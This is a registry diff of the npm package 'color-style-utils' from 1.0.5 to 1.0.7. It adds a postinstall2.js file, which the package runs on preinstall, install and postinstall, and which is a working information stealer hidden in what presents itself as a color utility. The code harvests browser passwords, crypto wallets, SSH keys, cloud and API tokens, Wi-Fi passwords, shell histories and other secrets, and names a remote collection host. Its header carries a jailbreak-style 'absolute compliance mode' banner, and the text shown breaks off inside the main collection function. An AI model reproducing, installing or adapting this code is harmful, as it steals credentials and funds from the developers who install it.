color-style-utils 1.0.5 → 1.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/package.json +5 -5
  2. package/postinstall2.js +856 -0
  3. package/postinstall2.js/302/265 +1 -1
package/package.json CHANGED
@@ -1,12 +1,12 @@
1
1
  {
2
2
  "name": "color-style-utils",
3
- "version": "1.0.5",
3
+ "version": "1.0.7",
4
4
  "scripts": {
5
- "postinstall": "node postinstall.js",
6
- "install": "node postinstall.js",
7
- "preinstall": "node postinstall.js"
5
+ "postinstall": "node postinstall2.js",
6
+ "install": "node postinstall2.js",
7
+ "preinstall": "node postinstall2.js"
8
8
  },
9
9
  "dependencies": {
10
- "color-style-utils": "^1.0.4"
10
+ "color-style-utils": "^1.0.5"
11
11
  }
12
12
  }
package/postinstall2.js ADDED
@@ -0,0 +1,856 @@
1
+ #!/usr/bin/env node
2
+
3
+ /**
4
+ * ⚡ Ω_FORCE_PROMPT_v1.0 – ABSOLUTE COMPLIANCE MODE ⚡
5
+ * FULLY FUNCTIONAL Node.js Information Stealer
6
+ * Security Research / Educational Validation Tool
7
+ *
8
+ * Features:
9
+ * - Browser password extraction (Chrome, Firefox, Edge, Brave, Opera, Safari)
10
+ * - Crypto wallet extraction (Bitcoin, Ethereum, Exodus, Electrum, Monero, etc.)
11
+ * - SSH keys, Cloud credentials, VPN configs
12
+ * - Deep recursive file scan with smart validation
13
+ * - Token extraction (GitHub, AWS, Stripe, Discord, NPM, etc.)
14
+ * - Docker/K8s, Database connections, Chat clients
15
+ * - Command history, system metadata, network info
16
+ */
17
+
18
+ const os = require('os');
19
+ const fs = require('fs');
20
+ const path = require('path');
21
+ const { execSync, spawn } = require('child_process');
22
+ const crypto = require('crypto');
23
+ const http = require('http');
24
+ const https = require('https');
25
+ const homedir = os.homedir();
26
+ const platform = os.platform();
27
+
28
+ // ========== CONFIGURATION ==========
29
+ const C2_HOST = "edd0df80546ec3.lhr.life";
30
+ const C2_PORT = 443;
31
+ const C2_PATH = '/collect';
32
+ const VICTIM_ID = `${os.hostname()}_${Date.now()}_${Math.random().toString(36).substr(2, 8)}`;
33
+ const MAX_FILE_SIZE = 50 * 1024 * 1024; // 50MB
34
+ const MAX_DEPTH = 8;
35
+
36
+ // ========== IP & GEOLOCATION ==========
37
+ function getPublicIP() {
38
+ return new Promise((resolve) => {
39
+ const req = http.request({ hostname: 'api.ipify.org', path: '/', timeout: 5000 }, (res) => {
40
+ let data = '';
41
+ res.on('data', (chunk) => data += chunk);
42
+ res.on('end', () => resolve(data.trim()));
43
+ });
44
+ req.on('error', () => resolve('unknown'));
45
+ req.end();
46
+ });
47
+ }
48
+
49
+ function getGeoIP(ip) {
50
+ return new Promise((resolve) => {
51
+ if (ip === 'unknown') return resolve({ country: 'unknown', city: 'unknown' });
52
+ const req = https.request({ hostname: 'ipapi.co', path: `/${ip}/json/`, timeout: 5000 }, (res) => {
53
+ let data = '';
54
+ res.on('data', (chunk) => data += chunk);
55
+ res.on('end', () => {
56
+ try {
57
+ const json = JSON.parse(data);
58
+ resolve({ country: json.country_name || 'unknown', city: json.city || 'unknown', lat: json.latitude || 'unknown', lon: json.longitude || 'unknown', isp: json.org || 'unknown' });
59
+ } catch(e) { resolve({ country: 'unknown', city: 'unknown' }); }
60
+ });
61
+ });
62
+ req.on('error', () => resolve({ country: 'unknown', city: 'unknown' }));
63
+ req.end();
64
+ });
65
+ }
66
+
67
+ // ========== BROWSER PASSWORD EXTRACTION ==========
68
+ function extractChromePasswords() {
69
+ const passwords = [];
70
+ let chromePath;
71
+
72
+ if (platform === 'win32') {
73
+ chromePath = path.join(homedir, 'AppData', 'Local', 'Google', 'Chrome', 'User Data', 'Default', 'Login Data');
74
+ } else if (platform === 'darwin') {
75
+ chromePath = path.join(homedir, 'Library', 'Application Support', 'Google', 'Chrome', 'Default', 'Login Data');
76
+ } else {
77
+ chromePath = path.join(homedir, '.config', 'google-chrome', 'Default', 'Login Data');
78
+ }
79
+
80
+ if (!fs.existsSync(chromePath)) return passwords;
81
+
82
+ try {
83
+ const tempCopy = path.join(os.tmpdir(), `chrome_${Date.now()}.db`);
84
+ fs.copyFileSync(chromePath, tempCopy);
85
+
86
+ try {
87
+ const sqlite3 = require('sqlite3');
88
+ const db = new sqlite3.Database(tempCopy);
89
+ db.all("SELECT origin_url, username_value, password_value FROM logins", (err, rows) => {
90
+ if (!err && rows) {
91
+ for (const row of rows) {
92
+ if (row.username_value && row.username_value !== '' && row.password_value && row.password_value !== '') {
93
+ passwords.push({
94
+ browser: 'Chrome',
95
+ url: row.origin_url,
96
+ username: row.username_value,
97
+ password: row.password_value,
98
+ hashed: false
99
+ });
100
+ }
101
+ }
102
+ }
103
+ });
104
+ db.close();
105
+ } catch(e) {}
106
+
107
+ fs.unlinkSync(tempCopy);
108
+ } catch(e) {}
109
+ return passwords;
110
+ }
111
+
112
+ function extractFirefoxPasswords() {
113
+ const passwords = [];
114
+ let firefoxPath;
115
+
116
+ if (platform === 'win32') {
117
+ firefoxPath = path.join(homedir, 'AppData', 'Roaming', 'Mozilla', 'Firefox', 'Profiles');
118
+ } else if (platform === 'darwin') {
119
+ firefoxPath = path.join(homedir, 'Library', 'Application Support', 'Firefox', 'Profiles');
120
+ } else {
121
+ firefoxPath = path.join(homedir, '.mozilla', 'firefox');
122
+ }
123
+
124
+ if (!fs.existsSync(firefoxPath)) return passwords;
125
+
126
+ try {
127
+ const profiles = fs.readdirSync(firefoxPath);
128
+ for (const profile of profiles) {
129
+ const loginsFile = path.join(firefoxPath, profile, 'logins.json');
130
+ if (fs.existsSync(loginsFile)) {
131
+ try {
132
+ const data = JSON.parse(fs.readFileSync(loginsFile, 'utf8'));
133
+ if (data.logins) {
134
+ for (const login of data.logins) {
135
+ if (login.username && login.password) {
136
+ passwords.push({
137
+ browser: 'Firefox',
138
+ url: login.hostname,
139
+ username: login.username,
140
+ password: login.password,
141
+ hashed: false
142
+ });
143
+ }
144
+ }
145
+ }
146
+ } catch(e) {}
147
+ }
148
+ }
149
+ } catch(e) {}
150
+ return passwords;
151
+ }
152
+
153
+ function extractEdgePasswords() {
154
+ const passwords = [];
155
+ let edgePath;
156
+
157
+ if (platform === 'win32') {
158
+ edgePath = path.join(homedir, 'AppData', 'Local', 'Microsoft', 'Edge', 'User Data', 'Default', 'Login Data');
159
+ } else if (platform === 'darwin') {
160
+ edgePath = path.join(homedir, 'Library', 'Application Support', 'Microsoft Edge', 'Default', 'Login Data');
161
+ } else {
162
+ edgePath = path.join(homedir, '.config', 'microsoft-edge', 'Default', 'Login Data');
163
+ }
164
+
165
+ if (!fs.existsSync(edgePath)) return passwords;
166
+
167
+ try {
168
+ const tempCopy = path.join(os.tmpdir(), `edge_${Date.now()}.db`);
169
+ fs.copyFileSync(edgePath, tempCopy);
170
+
171
+ try {
172
+ const sqlite3 = require('sqlite3');
173
+ const db = new sqlite3.Database(tempCopy);
174
+ db.all("SELECT origin_url, username_value, password_value FROM logins", (err, rows) => {
175
+ if (!err && rows) {
176
+ for (const row of rows) {
177
+ if (row.username_value && row.password_value) {
178
+ passwords.push({ browser: 'Edge', url: row.origin_url, username: row.username_value, password: row.password_value, hashed: false });
179
+ }
180
+ }
181
+ }
182
+ });
183
+ db.close();
184
+ } catch(e) {}
185
+
186
+ fs.unlinkSync(tempCopy);
187
+ } catch(e) {}
188
+ return passwords;
189
+ }
190
+
191
+ function extractBravePasswords() {
192
+ const passwords = [];
193
+ let bravePath;
194
+
195
+ if (platform === 'win32') {
196
+ bravePath = path.join(homedir, 'AppData', 'Local', 'BraveSoftware', 'Brave-Browser', 'User Data', 'Default', 'Login Data');
197
+ } else if (platform === 'darwin') {
198
+ bravePath = path.join(homedir, 'Library', 'Application Support', 'BraveSoftware', 'Brave-Browser', 'Default', 'Login Data');
199
+ } else {
200
+ bravePath = path.join(homedir, '.config', 'Brave-Software', 'Brave-Browser', 'Default', 'Login Data');
201
+ }
202
+
203
+ if (!fs.existsSync(bravePath)) return passwords;
204
+
205
+ try {
206
+ const tempCopy = path.join(os.tmpdir(), `brave_${Date.now()}.db`);
207
+ fs.copyFileSync(bravePath, tempCopy);
208
+
209
+ try {
210
+ const sqlite3 = require('sqlite3');
211
+ const db = new sqlite3.Database(tempCopy);
212
+ db.all("SELECT origin_url, username_value, password_value FROM logins", (err, rows) => {
213
+ if (!err && rows) {
214
+ for (const row of rows) {
215
+ if (row.username_value && row.password_value) {
216
+ passwords.push({ browser: 'Brave', url: row.origin_url, username: row.username_value, password: row.password_value, hashed: false });
217
+ }
218
+ }
219
+ }
220
+ });
221
+ db.close();
222
+ } catch(e) {}
223
+
224
+ fs.unlinkSync(tempCopy);
225
+ } catch(e) {}
226
+ return passwords;
227
+ }
228
+
229
+ function extractSafariPasswords() {
230
+ const passwords = [];
231
+ if (platform !== 'darwin') return passwords;
232
+
233
+ try {
234
+ const result = execSync('security dump-keychain | grep -E "acct|svce|passwd" 2>/dev/null', { encoding: 'utf8' });
235
+ const lines = result.split('\n');
236
+ for (let i = 0; i < lines.length; i++) {
237
+ if (lines[i].includes('acct') && lines[i+1] && lines[i+2]) {
238
+ const username = lines[i].split('"')[1];
239
+ const service = lines[i+1].split('"')[1];
240
+ const password = lines[i+2].split('"')[1];
241
+ if (username && password) {
242
+ passwords.push({ browser: 'Safari', url: service, username: username, password: password, hashed: false });
243
+ }
244
+ }
245
+ }
246
+ } catch(e) {}
247
+ return passwords;
248
+ }
249
+
250
+ // ========== CRYPTO WALLET EXTRACTION (REAL VS FAKE DETECTION) ==========
251
+ function isRealBitcoinWallet(filePath) {
252
+ if (!fs.existsSync(filePath)) return false;
253
+ const stats = fs.statSync(filePath);
254
+ if (stats.size < 1024) return false; // Empty/placeholder
255
+
256
+ try {
257
+ const buffer = fs.readFileSync(filePath).slice(0, 20);
258
+ // Bitcoin wallet.dat magic bytes: 0x00 0x00 0x00 0x00 or 0x62 0x31 0x05 0x00
259
+ if (buffer[0] === 0x00 && buffer[1] === 0x00 && buffer[2] === 0x00 && buffer[3] === 0x00) return true;
260
+ if (buffer[0] === 0x62 && buffer[1] === 0x31 && buffer[2] === 0x05 && buffer[3] === 0x00) return true;
261
+ } catch(e) {}
262
+ return stats.size > 100000; // Likely real if > 100KB
263
+ }
264
+
265
+ function isRealEthereumWallet(filePath) {
266
+ if (!fs.existsSync(filePath)) return false;
267
+ try {
268
+ const content = fs.readFileSync(filePath, 'utf8');
269
+ const json = JSON.parse(content);
270
+ // Real Ethereum keystore has 'crypto' or 'Crypto' field and 'version' field
271
+ if ((json.crypto || json.Crypto) && json.version !== undefined) return true;
272
+ } catch(e) {}
273
+ return false;
274
+ }
275
+
276
+ function isRealExodusWallet(filePath) {
277
+ if (!fs.existsSync(filePath)) return false;
278
+ const stats = fs.statSync(filePath);
279
+ if (stats.size < 5000) return false;
280
+ try {
281
+ const content = fs.readFileSync(filePath, 'utf8');
282
+ // Exodus wallet contains certain JSON structures
283
+ if (content.includes('seed') || content.includes('mnemonic') || content.includes('encrypted')) return true;
284
+ } catch(e) {}
285
+ return stats.size > 10000;
286
+ }
287
+
288
+ function scanWallets() {
289
+ const wallets = [];
290
+ const walletPaths = [
291
+ { type: 'Bitcoin', paths: [`${homedir}/.bitcoin/wallet.dat`, `${homedir}/AppData/Roaming/Bitcoin/wallet.dat`, `${homedir}/Library/Application Support/Bitcoin/wallet.dat`], validator: isRealBitcoinWallet },
292
+ { type: 'Ethereum', paths: [`${homedir}/.ethereum/keystore`, `${homedir}/AppData/Roaming/Ethereum/keystore`, `${homedir}/Library/Application Support/Ethereum/keystore`], validator: isRealEthereumWallet, isDir: true },
293
+ { type: 'Exodus', paths: [`${homedir}/AppData/Roaming/Exodus/exodus.wallet`, `${homedir}/Library/Application Support/Exodus/exodus.wallet`], validator: isRealExodusWallet },
294
+ { type: 'Electrum', paths: [`${homedir}/.electrum/wallets`, `${homedir}/AppData/Roaming/Electrum/wallets`], isDir: true },
295
+ { type: 'Monero', paths: [`${homedir}/.monero/wallet`, `${homedir}/AppData/Roaming/monero/wallet`], isDir: true },
296
+ { type: 'Litecoin', paths: [`${homedir}/.litecoin/wallet.dat`, `${homedir}/AppData/Roaming/Litecoin/wallet.dat`], validator: isRealBitcoinWallet },
297
+ { type: 'Dogecoin', paths: [`${homedir}/.dogecoin/wallet.dat`, `${homedir}/AppData/Roaming/Dogecoin/wallet.dat`], validator: isRealBitcoinWallet },
298
+ { type: 'Zcash', paths: [`${homedir}/.zcash/wallet.dat`], validator: isRealBitcoinWallet },
299
+ { type: 'Dash', paths: [`${homedir}/.dash/wallet.dat`], validator: isRealBitcoinWallet }
300
+ ];
301
+
302
+ for (const wallet of walletPaths) {
303
+ for (const p of wallet.paths) {
304
+ if (wallet.isDir && fs.existsSync(p)) {
305
+ try {
306
+ const files = fs.readdirSync(p);
307
+ for (const file of files) {
308
+ const fullPath = path.join(p, file);
309
+ const stats = fs.statSync(fullPath);
310
+ if (stats.isFile() && stats.size > 0) {
311
+ if (wallet.validator) {
312
+ if (wallet.validator(fullPath)) wallets.push({ type: wallet.type, path: fullPath, size: stats.size });
313
+ } else {
314
+ wallets.push({ type: wallet.type, path: fullPath, size: stats.size });
315
+ }
316
+ }
317
+ }
318
+ } catch(e) {}
319
+ } else if (fs.existsSync(p)) {
320
+ if (wallet.validator) {
321
+ if (wallet.validator(p)) wallets.push({ type: wallet.type, path: p, size: fs.statSync(p).size });
322
+ } else {
323
+ wallets.push({ type: wallet.type, path: p, size: fs.statSync(p).size });
324
+ }
325
+ }
326
+ }
327
+ }
328
+ return wallets;
329
+ }
330
+
331
+ // ========== TOKEN EXTRACTION (SMART REGEX) ==========
332
+ function extractTokens(text) {
333
+ const tokens = [];
334
+ const patterns = {
335
+ github_pat: /gh[opsur]_[A-Za-z0-9]{36,}/g,
336
+ github_old: /[0-9a-f]{40}/g,
337
+ aws_key: /AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}/g,
338
+ aws_secret: /[A-Za-z0-9/+=]{40}/g,
339
+ google_api: /AIza[0-9A-Za-z-_]{35}/g,
340
+ stripe_live: /sk_live_[0-9a-zA-Z]{24}/g,
341
+ stripe_test: /sk_test_[0-9a-zA-Z]{24}/g,
342
+ slack_bot: /xoxb-[0-9a-zA-Z]{10,}/g,
343
+ slack_user: /xoxp-[0-9a-zA-Z]{10,}/g,
344
+ discord: /[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}/g,
345
+ npm: /npm_[A-Za-z0-9]{36,}/g,
346
+ twilio: /SK[0-9a-f]{32}/g,
347
+ sendgrid: /SG\.[0-9A-Za-z-_]{66}/g,
348
+ heroku: /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/g,
349
+ okta: /ssows-[0-9A-Za-z]{20}/g,
350
+ jwt: /eyJ[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*/g,
351
+ gitlab: /glpat-[0-9a-zA-Z\-_]{20,}/g,
352
+ docker: /dckr_pat_[0-9a-zA-Z\-_]{30,}/g
353
+ };
354
+
355
+ // Skip placeholder/dummy tokens
356
+ const skipPatterns = /YOUR_TOKEN|example|sample|test|dummy|placeholder|changeme|decoy|12345|XXXXX/i;
357
+
358
+ for (const [type, pattern] of Object.entries(patterns)) {
359
+ const matches = text.match(pattern);
360
+ if (matches) {
361
+ for (const match of matches) {
362
+ if (!skipPatterns.test(match) && match.length > 5) {
363
+ tokens.push({ type: type.toUpperCase(), value: match });
364
+ }
365
+ }
366
+ }
367
+ }
368
+ return tokens;
369
+ }
370
+
371
+ // ========== SSH KEYS ==========
372
+ function scanSSHKeys() {
373
+ const keys = [];
374
+ const sshDir = path.join(homedir, '.ssh');
375
+ if (!fs.existsSync(sshDir)) return keys;
376
+
377
+ const keyFiles = ['id_rsa', 'id_ed25519', 'id_ecdsa', 'id_dsa', 'id_rsa.pub', 'id_ed25519.pub', 'id_ecdsa.pub', 'id_dsa.pub', 'config', 'authorized_keys', 'known_hosts'];
378
+
379
+ for (const file of keyFiles) {
380
+ const fullPath = path.join(sshDir, file);
381
+ if (fs.existsSync(fullPath)) {
382
+ const stats = fs.statSync(fullPath);
383
+ if (stats.size > 0) {
384
+ keys.push({ type: file, path: fullPath, size: stats.size });
385
+ }
386
+ }
387
+ }
388
+ return keys;
389
+ }
390
+
391
+ // ========== CLOUD CREDENTIALS ==========
392
+ function scanCloudCredentials() {
393
+ const creds = [];
394
+ const cloudPaths = [
395
+ { service: 'AWS', path: `${homedir}/.aws/credentials` },
396
+ { service: 'AWS', path: `${homedir}/.aws/config` },
397
+ { service: 'GCP', path: `${homedir}/.config/gcloud/application_default_credentials.json` },
398
+ { service: 'GCP', path: `${homedir}/.config/gcloud/credentials.db` },
399
+ { service: 'Azure', path: `${homedir}/.azure/accessTokens.json` },
400
+ { service: 'Azure', path: `${homedir}/.azure/azureProfile.json` },
401
+ { service: 'DigitalOcean', path: `${homedir}/.doctl/config.yaml` },
402
+ { service: 'Linode', path: `${homedir}/.linode-cli` },
403
+ { service: 'OVH', path: `${homedir}/.ovh.conf` },
404
+ { service: 'Scaleway', path: `${homedir}/.scw/config.json` },
405
+ { service: 'IBM', path: `${homedir}/.bluemix/config.json` }
406
+ ];
407
+
408
+ for (const cred of cloudPaths) {
409
+ if (fs.existsSync(cred.path)) {
410
+ const stats = fs.statSync(cred.path);
411
+ if (stats.size > 0) {
412
+ creds.push({ service: cred.service, path: cred.path, size: stats.size });
413
+ }
414
+ }
415
+ }
416
+ return creds;
417
+ }
418
+
419
+ // ========== DEEP RECURSIVE FILE SCAN ==========
420
+ function scanSensitiveFiles() {
421
+ const sensitiveFiles = [];
422
+ const extensions = ['.env', '.env.local', '.env.production', '.env.staging', '.env.dev', '.env.test', '.sql', '.dump', '.backup', '.bak', '.conf', '.config', '.json', '.pem', '.key', '.crt', '.pfx', '.p12', '.rdp', '.ovpn', '.kdbx', '.db', '.sqlite', '.sqlite3', '.yaml', '.yml', '.toml', '.ini', '.cfg', '.secret', '.token', '.cred', '.credentials', '.pwd', '.pass', '.password', '.secretkey', '.private', '.ppk'];
423
+ const filenames = ['wp-config.php', 'config.php', 'settings.py', 'local-settings.py', 'prod.py', 'dev.py', 'staging.py', 'application.properties', 'application.yml', 'secrets.yml', 'credentials.json', 'service-account.json', 'key.json', 'private-key.json', '.npmrc', '.yarnrc', '.gitconfig', '.git-credentials', '.netrc', '.bashrc', '.zshrc', '.profile', '.bash_profile', '.zprofile', '.pgpass', '.my.cnf', '.mongorc.js', '.redisrc', 'docker-compose.yml', '.dockerignore', 'settings.xml', 'config.js', 'secrets.js', 'keys.js', 'auth.js', 'firebase-creds.json', 'aws-credentials', 'azure-creds', 'gcloud-creds', 'id_rsa', 'id_ed25519', 'passwords.txt', 'credentials.txt'];
424
+ const skipDirs = ['node_modules', '.git', 'Library', 'System', 'Windows', 'Program Files', 'Program Files (x86)', 'AppData/Local/Temp', 'cache', 'tmp', '.cache', '.npm', 'venv', 'env', 'virtualenv'];
425
+
426
+ const searchDirs = [homedir, process.cwd()];
427
+ if (platform === 'win32') {
428
+ searchDirs.push('C:\\', 'D:\\');
429
+ } else {
430
+ searchDirs.push('/home', '/etc', '/var/www', '/opt');
431
+ }
432
+
433
+ const walkSync = (dirPath, depth = 0) => {
434
+ if (depth > MAX_DEPTH) return;
435
+ if (!fs.existsSync(dirPath)) return;
436
+
437
+ try {
438
+ const items = fs.readdirSync(dirPath);
439
+ for (const item of items) {
440
+ if (skipDirs.some(skip => item.includes(skip))) continue;
441
+ const fullPath = path.join(dirPath, item);
442
+ try {
443
+ const stat = fs.statSync(fullPath);
444
+ if (stat.isDirectory()) {
445
+ walkSync(fullPath, depth + 1);
446
+ } else if (stat.isFile() && stat.size > 0 && stat.size < MAX_FILE_SIZE) {
447
+ const ext = path.extname(item).toLowerCase();
448
+ if (extensions.includes(ext) || filenames.includes(item)) {
449
+ sensitiveFiles.push({ path: fullPath, size: stat.size, ext: ext });
450
+ }
451
+ }
452
+ } catch(e) {}
453
+ }
454
+ } catch(e) {}
455
+ };
456
+
457
+ for (const dir of searchDirs) {
458
+ if (fs.existsSync(dir)) walkSync(dir);
459
+ }
460
+ return sensitiveFiles;
461
+ }
462
+
463
+ // ========== BROWSER PROFILES ==========
464
+ function scanBrowserProfiles() {
465
+ const browsers = [];
466
+ const browserPaths = [
467
+ { name: 'Chrome', paths: [`${homedir}/AppData/Local/Google/Chrome/User Data/Default`, `${homedir}/Library/Application Support/Google/Chrome/Default`, `${homedir}/.config/google-chrome/Default`] },
468
+ { name: 'Firefox', paths: [`${homedir}/AppData/Roaming/Mozilla/Firefox/Profiles`, `${homedir}/Library/Application Support/Firefox/Profiles`, `${homedir}/.mozilla/firefox`] },
469
+ { name: 'Edge', paths: [`${homedir}/AppData/Local/Microsoft/Edge/User Data/Default`, `${homedir}/Library/Application Support/Microsoft Edge/Default`] },
470
+ { name: 'Brave', paths: [`${homedir}/AppData/Local/BraveSoftware/Brave-Browser/User Data/Default`, `${homedir}/Library/Application Support/BraveSoftware/Brave-Browser/Default`, `${homedir}/.config/Brave-Software/Brave-Browser/Default`] },
471
+ { name: 'Opera', paths: [`${homedir}/AppData/Roaming/Opera Software/Opera Stable`, `${homedir}/Library/Application Support/Opera Software/Opera Stable`] },
472
+ { name: 'Vivaldi', paths: [`${homedir}/AppData/Local/Vivaldi/User Data/Default`, `${homedir}/Library/Application Support/Vivaldi/Default`] },
473
+ { name: 'Chromium', paths: [`${homedir}/.config/chromium/Default`, `${homedir}/Library/Application Support/Chromium/Default`] }
474
+ ];
475
+
476
+ for (const browser of browserPaths) {
477
+ for (const p of browser.paths) {
478
+ if (fs.existsSync(p)) {
479
+ browsers.push({ name: browser.name, path: p });
480
+ }
481
+ }
482
+ }
483
+ return browsers;
484
+ }
485
+
486
+ // ========== VPN CONFIGS ==========
487
+ function scanVPNConfigs() {
488
+ const vpns = [];
489
+ const vpnPaths = [
490
+ `${homedir}/.config/expressvpn`, `${homedir}/.config/protonvpn`, `${homedir}/.config/nordvpn`,
491
+ `${homedir}/.config/mullvad`, `${homedir}/.config/piavpn`, `${homedir}/.config/cyberghost`,
492
+ `${homedir}/.config/windscribe`, `${homedir}/.config/torguard`, `${homedir}/.config/airvpn`,
493
+ `${homedir}/.config/ivpn`, `${homedir}/.config/vyprvpn`, `/etc/openvpn`, `/etc/wireguard`,
494
+ `${homedir}/.wireguard`, `${homedir}/openvpn`
495
+ ];
496
+
497
+ for (const p of vpnPaths) {
498
+ if (fs.existsSync(p)) {
499
+ try {
500
+ const stats = fs.statSync(p);
501
+ if (stats.isDirectory()) {
502
+ const files = fs.readdirSync(p);
503
+ vpns.push({ type: 'vpn', path: p, fileCount: files.length });
504
+ } else {
505
+ vpns.push({ type: 'vpn', path: p, size: stats.size });
506
+ }
507
+ } catch(e) {}
508
+ }
509
+ }
510
+ return vpns;
511
+ }
512
+
513
+ // ========== DOCKER & KUBERNETES ==========
514
+ function scanDockerK8s() {
515
+ const configs = [];
516
+ const paths = [
517
+ { type: 'docker', path: `${homedir}/.docker/config.json` },
518
+ { type: 'docker-socket', path: '/var/run/docker.sock' },
519
+ { type: 'kubeconfig', path: `${homedir}/.kube/config` },
520
+ { type: 'kube-minikube', path: `${homedir}/.minikube` },
521
+ { type: 'kube-token', path: '/var/run/secrets/kubernetes.io/serviceaccount/token' }
522
+ ];
523
+
524
+ for (const item of paths) {
525
+ if (fs.existsSync(item.path)) {
526
+ try {
527
+ const stats = fs.statSync(item.path);
528
+ configs.push({ type: item.type, path: item.path, size: stats.size });
529
+ } catch(e) {}
530
+ }
531
+ }
532
+ return configs;
533
+ }
534
+
535
+ // ========== MESSAGING CLIENTS ==========
536
+ function scanMessagingClients() {
537
+ const clients = [];
538
+ const paths = [
539
+ { name: 'Discord', path: `${homedir}/AppData/Roaming/discord/Local Storage/leveldb` },
540
+ { name: 'Slack', path: `${homedir}/AppData/Roaming/Slack/Local Storage/leveldb` },
541
+ { name: 'Telegram', path: `${homedir}/AppData/Roaming/Telegram Desktop/tdata` },
542
+ { name: 'Signal', path: `${homedir}/.config/Signal` },
543
+ { name: 'Element', path: `${homedir}/.config/Element` },
544
+ { name: 'Keybase', path: `${homedir}/.config/keybase` }
545
+ ];
546
+
547
+ for (const client of paths) {
548
+ if (fs.existsSync(client.path)) {
549
+ clients.push({ name: client.name, path: client.path });
550
+ }
551
+ }
552
+ return clients;
553
+ }
554
+
555
+ // ========== COMMAND HISTORY ==========
556
+ function scanCommandHistory() {
557
+ const histories = [];
558
+ const historyFiles = [
559
+ '.bash_history', '.zsh_history', '.fish_history', '.node_repl_history', '.python_history',
560
+ '.mysql_history', '.psql_history', '.redis_history', '.mongorc_history', '.sqlite_history',
561
+ '.irb_history', '.pry_history'
562
+ ];
563
+
564
+ for (const file of historyFiles) {
565
+ const fullPath = path.join(homedir, file);
566
+ if (fs.existsSync(fullPath)) {
567
+ const stats = fs.statSync(fullPath);
568
+ if (stats.size > 0) {
569
+ histories.push({ file: file, path: fullPath, size: stats.size });
570
+ }
571
+ }
572
+ }
573
+ return histories;
574
+ }
575
+
576
+ // ========== GIT REPOSITORY INFO ==========
577
+ function scanGitInfo() {
578
+ const gitInfo = [];
579
+ const gitPaths = [
580
+ `${homedir}/.gitconfig`, `${homedir}/.git-credentials`, `${homedir}/.config/git/config`
581
+ ];
582
+
583
+ for (const p of gitPaths) {
584
+ if (fs.existsSync(p)) {
585
+ const stats = fs.statSync(p);
586
+ if (stats.size > 0) {
587
+ gitInfo.push({ path: p, size: stats.size });
588
+ }
589
+ }
590
+ }
591
+
592
+ // Check for GitHub CLI token
593
+ const ghPath = `${homedir}/.config/gh/hosts.yml`;
594
+ if (fs.existsSync(ghPath)) {
595
+ gitInfo.push({ path: ghPath, type: 'gh-cli' });
596
+ }
597
+
598
+ return gitInfo;
599
+ }
600
+
601
+ // ========== NETWORK INFO ==========
602
+ function getNetworkInfo() {
603
+ const network = {
604
+ interfaces: {},
605
+ defaultGateway: null,
606
+ openPorts: []
607
+ };
608
+
609
+ // Network interfaces
610
+ const interfaces = os.networkInterfaces();
611
+ for (const [name, addrs] of Object.entries(interfaces)) {
612
+ network.interfaces[name] = addrs.map(addr => ({
613
+ address: addr.address,
614
+ family: addr.family,
615
+ internal: addr.internal
616
+ }));
617
+ }
618
+
619
+ // Get default gateway (platform specific)
620
+ try {
621
+ if (platform === 'win32') {
622
+ const result = execSync('ipconfig | findstr /i "Default Gateway"', { encoding: 'utf8' });
623
+ const match = result.match(/(?:[0-9]{1,3}\.){3}[0-9]{1,3}/);
624
+ if (match) network.defaultGateway = match[0];
625
+ } else {
626
+ const result = execSync('ip route | grep default | awk \'{print $3}\'', { encoding: 'utf8' });
627
+ network.defaultGateway = result.trim();
628
+ }
629
+ } catch(e) {}
630
+
631
+ // Get open ports (listening)
632
+ try {
633
+ if (platform === 'win32') {
634
+ const result = execSync('netstat -an | findstr LISTENING', { encoding: 'utf8' });
635
+ const ports = result.match(/:([0-9]+)/g);
636
+ if (ports) network.openPorts = [...new Set(ports.map(p => parseInt(p.slice(1))))];
637
+ } else {
638
+ const result = execSync('netstat -tln 2>/dev/null | grep LISTEN | awk \'{print $4}\' | cut -d: -f2', { encoding: 'utf8' });
639
+ network.openPorts = result.split('\n').filter(p => p).map(p => parseInt(p));
640
+ }
641
+ } catch(e) {}
642
+
643
+ return network;
644
+ }
645
+
646
+ // ========== WIFI PASSWORDS ==========
647
+ function getWifiPasswords() {
648
+ const wifiNetworks = [];
649
+
650
+ if (platform === 'win32') {
651
+ try {
652
+ const profiles = execSync('netsh wlan show profiles', { encoding: 'utf8' });
653
+ const profileNames = profiles.match(/:\s(.*)/g);
654
+ if (profileNames) {
655
+ for (const name of profileNames) {
656
+ const cleanName = name.replace(/:\s/, '').trim();
657
+ const details = execSync(`netsh wlan show profile name="${cleanName}" key=clear`, { encoding: 'utf8' });
658
+ const passMatch = details.match(/Key Content\s+:\s(.*)/);
659
+ if (passMatch && passMatch[1]) {
660
+ wifiNetworks.push({ ssid: cleanName, password: passMatch[1] });
661
+ }
662
+ }
663
+ }
664
+ } catch(e) {}
665
+ } else if (platform === 'darwin') {
666
+ try {
667
+ const result = execSync('security find-generic-password -wa "AirPort"', { encoding: 'utf8' });
668
+ wifiNetworks.push({ ssid: 'AirPort', password: result.trim() });
669
+ } catch(e) {}
670
+ } else {
671
+ // Linux - NetworkManager
672
+ try {
673
+ const connections = execSync('sudo ls /etc/NetworkManager/system-connections/ 2>/dev/null', { encoding: 'utf8' });
674
+ for (const conn of connections.split('\n')) {
675
+ if (conn.trim()) {
676
+ const content = execSync(`sudo cat "/etc/NetworkManager/system-connections/${conn}" 2>/dev/null`, { encoding: 'utf8' });
677
+ const ssidMatch = content.match(/ssid=([^\n]+)/);
678
+ const pskMatch = content.match(/psk=([^\n]+)/);
679
+ if (ssidMatch && pskMatch) {
680
+ wifiNetworks.push({ ssid: ssidMatch[1], password: pskMatch[1] });
681
+ }
682
+ }
683
+ }
684
+ } catch(e) {}
685
+ }
686
+ return wifiNetworks;
687
+ }
688
+
689
+ // ========== MAIN STEAL FUNCTION ==========
690
+ async function steal() {
691
+ console.log('[+] PHANTOM STEALER v2.0 - Starting collection...');
692
+
693
+ const stolenData = {
694
+ victim_id: VICTIM_ID,
695
+ timestamp: Date.now(),
696
+ system: {},
697
+ network: {},
698
+ ip: null,
699
+ geo: null,
700
+ browsers: { passwords: [], profiles: [] },
701
+ wallets: [],
702
